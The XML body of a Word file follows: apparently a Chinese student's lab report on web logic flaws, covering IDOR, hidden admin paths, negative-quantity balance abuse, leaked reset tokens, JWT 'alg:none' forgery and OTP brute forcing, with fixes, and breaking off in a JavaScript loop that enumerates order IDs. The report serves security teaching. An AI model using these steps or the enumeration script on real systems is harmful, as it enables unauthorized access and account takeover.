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9CC46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>人工智能与大数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">学院 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>计算机应用工程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>专业学生实训报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E4124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="9781" w:type="dxa"/>
        <w:tblInd w:w="-7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1559"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1307"/>
        <w:gridCol w:w="8"/>
        <w:gridCol w:w="1803"/>
      </w:tblGrid>
      <w:tr w14:paraId="584A6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985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D65E642">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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 xml:space="preserve">姓 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="793F5D32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李家雄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EE744A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专业班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5942378D">
            <w:pPr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23计算机工程本科6班</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
            <w:tcBorders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5C59F77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 xml:space="preserve">学 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02783308">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2023410106</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4EEE5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985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A057DC5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FB6B4C5">
            <w:pPr>
              <w:jc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逻辑漏洞利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1315" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F41F15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指导教师</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD44F2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王清宇</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E2B5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985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="279358EE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训地点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AC763CC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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7501</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1315" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E4C71E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日期时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45BBBC1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2026.6.4s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43869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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70E0AAE6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4018BAC5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1. IDOR水平越权：掌握通过枚举自增ID越权访问他人订单的方法，理解资源归属校验的必要性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D965D1F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2. 垂直越权：学会子路径爆破发现隐藏管理员接口，理解功能级权限校验的常见遗漏点。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254F350C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3. 负数金额逻辑漏洞：掌握利用负数数量篡改余额的业务逻辑缺陷，理解输入下界校验的重要性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353DD13D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4. 密码重置Token泄露：识别重置令牌在HTTP响应中直接返回的漏洞，理解带外身份证明原则。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A54464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5. JWT算法降级：学会构造alg:none的伪造令牌绕过签名校验，理解强制算法白名单的必要性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D33490F">
            <w:pPr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6. OTP无速率限制：掌握对6位数字验证码的并发爆破技巧，理解认证接口速率限制的关键作用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2294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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CDE00CB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训仪器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD12465">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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与用具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="716DF674">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋" w:eastAsia="仿宋_GB2312" w:cs="仿宋"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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Windows操作系统、Burpsuite、python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21022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0" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D33FDDB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训任务</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9E8770">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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及要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72BE9519">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>实训任务：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146ACFE1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务1：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IDOR水平越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E5611D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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使用测试账号guest/guest123登录订单系统，观察订单号自增规律。通过修改/order?id=参数中的id值，枚举其他用户的订单（如1003、1337等），找到admin订单中的flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B59E83">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务2：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>垂直越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBC2C28">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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使用user/user123登录后台系统，发现/admin返回403。使用目录爆破工具（如ffuf或dirsearch）配合admin子路径字典，扫描隐藏的管理接口，找到未做角色校验的/admin/secret路径，直接访问获取flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1918D7C3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务3：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>负数金额逻辑漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B39811E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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登录商城系统，初始余额100元。正常购买flag商品余额不足。通过构造负数数量（如qty=-30000）购买低价商品，使余额异常增加。然后购买flag商品，在响应中获取flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D52DDC">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务4：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>密码重置Token泄露</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58C5ECB6">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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使用忘记密码功能，输入用户名admin。观察HTTP响应中是否直接返回重置链接（包含token）。复制该链接直接访问，设置新密码，然后用新密码登录admin账户，在首页获取flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69DA9017">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务5：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>JWT算法降级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315F089F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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使用guest/guest123登录JWT API，获得普通用户的JWT。将JWT的header中的alg字段改为none，payload中的role改为admin，签名段置空。构造新的token，访问/api/flag接口，绕过签名校验获取flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC7C700">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务6：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OTP无速率限制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCCAA6E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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目标登录接口使用6位数字OTP验证，无失败次数限制、无账号锁定、无IP限速。编写并发脚本（如使用concurrent.futures或asyncio），从000000到999999枚举OTP，根据响应状态码（302重定向）判断命中，最终登录admin获取flag。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25DA8B7D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>实训要求：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C25F813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1、按照指导老师实训内容独立完成实训内容和实训报告</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67AADD8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2、按照指导老师要求在实训截止时间内在学习通上交电子文档报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B67D49C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="87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1136"/>
      </w:tblGrid>
      <w:tr w14:paraId="62A66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3598" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:textDirection w:val="tbRlV"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09544436">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194E7EEE">
            <w:pPr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 xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IDOR水平越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714273AA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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IDOR（不安全的直接对象引用）源于开发者只验证了用户是否登录（认证），却未验证所请求资源是否属于当前用户（授权）。订单详情接口/order?id=1001通过自增整数id直接定位订单记录，服务端从SESSION获取用户身份后，未校验订单的owner字段是否与当前用户匹配。攻击者登录guest账号后，仅需修改id参数即可遍历所有订单。由于列表页按用户过滤而详情页漏掉归属检查，导致水平越权。正确防御应使用参数化查询并附加WHERE user_id = current_user条件，或返回404而非403以避免枚举确认。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407D06C5">
            <w:pPr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  <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>垂直越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3779A821">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/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垂直越权（BFLA）发生在低权限用户能够访问高权限接口时。本题中，/admin入口做了角色校验返回403，但开发者复制粘贴权限检查时遗漏了/admin/secret子路径。攻击者通过目录爆破工具枚举常见admin子路径（如/admin/secret、/admin/export），发现该接口只检查登录态而未检查role字段。由于响应长度（74字节）与首页fallback（165字节）及403页面（25字节）明显不同，攻击者可定位漏洞接口。垂直越权的根本原因是权限校验未统一通过中间件或基类实现，而是分散在各路由中，导致遗漏。</w:t>
            </w:r>
            <w:r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  <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>负数金额逻辑漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592F76CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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业务逻辑漏洞利用开发者在数值输入校验时的假设缺陷。购买接口POST /buy接收qty参数，后端仅做了(int)类型转换，未校验下界（qty ≥ 1）。攻击者提交qty=-30000，计算total = price × (-30000)为负数，余额检查条件balance &gt;= total因负数而恒真（例如100 &gt;= -150000），通过校验后执行balance -= total，实际变成加法（减去负数等于加正数），导致余额暴涨。此漏洞本质是忽略了用户输入可为负数的可能性，正确的修复应使用filter_var配合min_range进行双边范围校验，并将金额以整数分存储。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023D4BAA">
            <w:pPr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  <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>密码重置Token泄露</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC5B658">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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安全的密码重置流程要求令牌通过带外通道（如邮件、短信）发送给账号持有者，攻击者无法截获。本题中，/forgot接口接收用户名admin后，直接在HTTP响应体中返回重置链接（含token），即令牌通过请求-响应的同信道返回。攻击者只需发起一次重置请求，即可从响应HTML中提取token，然后直接访问/reset页面设置新密码，最终登录admin账户。此漏洞违反了“身份证明必须发给账号拥有者，不能发给请求发起者”的基本原则。防御措施包括：仅返回“已发送”提示，令牌通过邮件发送且设置短有效期，重置成功后销毁所有旧会话。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3BFE59">
            <w:pPr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  <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>JWT算法降级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC1105B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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JWT规范中alg=none本应用于测试场景，要求服务端拒绝接受。但本题代码从JWT header中读取alg字段，当值为none时调用jwt.decode(token, options={'verify_signature': False})，完全跳过签名校验。攻击者使用合法guest token解码结构后，将header改为{"alg":"none","typ":"JWT"}，payload改为{"user":"admin","role":"admin"}，签名段置空（末尾保留点），构造新token。服务端接受后直接信任payload中的role=admin，从而绕过身份验证获取flag。此漏洞的根源是信任用户可控的算法声明，正确做法是服务端固定算法白名单（如algorithms=['HS256']），绝不从header读取。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F51D48C">
            <w:pPr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  <w:t xml:space="preserve">六. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OTP无速率限制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E385875"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6位数字OTP的搜索空间为1,000,000，在无任何防护措施下可被暴力破解。本题/verify接口缺失六层防御：失败次数计数、账号锁定、IP速率限制、OTP过期、一次性消费、验证码。攻击者利用HTTP并发（60线程）以约500请求/秒的速度枚举所有可能的6位数字，平均约16分钟即可命中正确OTP（最坏33分钟）。命中后服务端返回302重定向，携带session变为admin，访问首页即可获得flag。此漏洞证明：即使OTP随机且空间足够大，若无速率限制和生命周期管理，低熵凭证仍可在短时间内被穷举。防御需组合账户级失败计数、IP限流、OTP过期（如5分钟）及一次性失效机制。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FC57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57" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:textDirection w:val="tbRlV"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07293E63">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训步骤或过程(内容)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DCC9561">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务1：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IDOR水平越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C4AEEE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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="1488440"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="20782193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21936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8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A716AD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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2847975" cy="2447925"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="19462516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25169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73" cy="244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2A9EF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按</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> F12 打开开发者工具</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EB96117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点击</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Console 标签</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363B079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javascript</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119F4277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for(let i=1; i&lt;=2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>; i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C58674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fetch('/order?id=' + i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C3E4F6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.then(r =&gt; r.text())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67337C85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.then(html =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3CDB46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if(!html.includes('订单不存在') &amp;&amp; !html.includes('guest')) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B4E7EA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    console.log('Found: id=' + i);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5131F3E4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    console.log(html);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046663A6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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67098768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});</w:t>
            </w:r>
          </w:p>
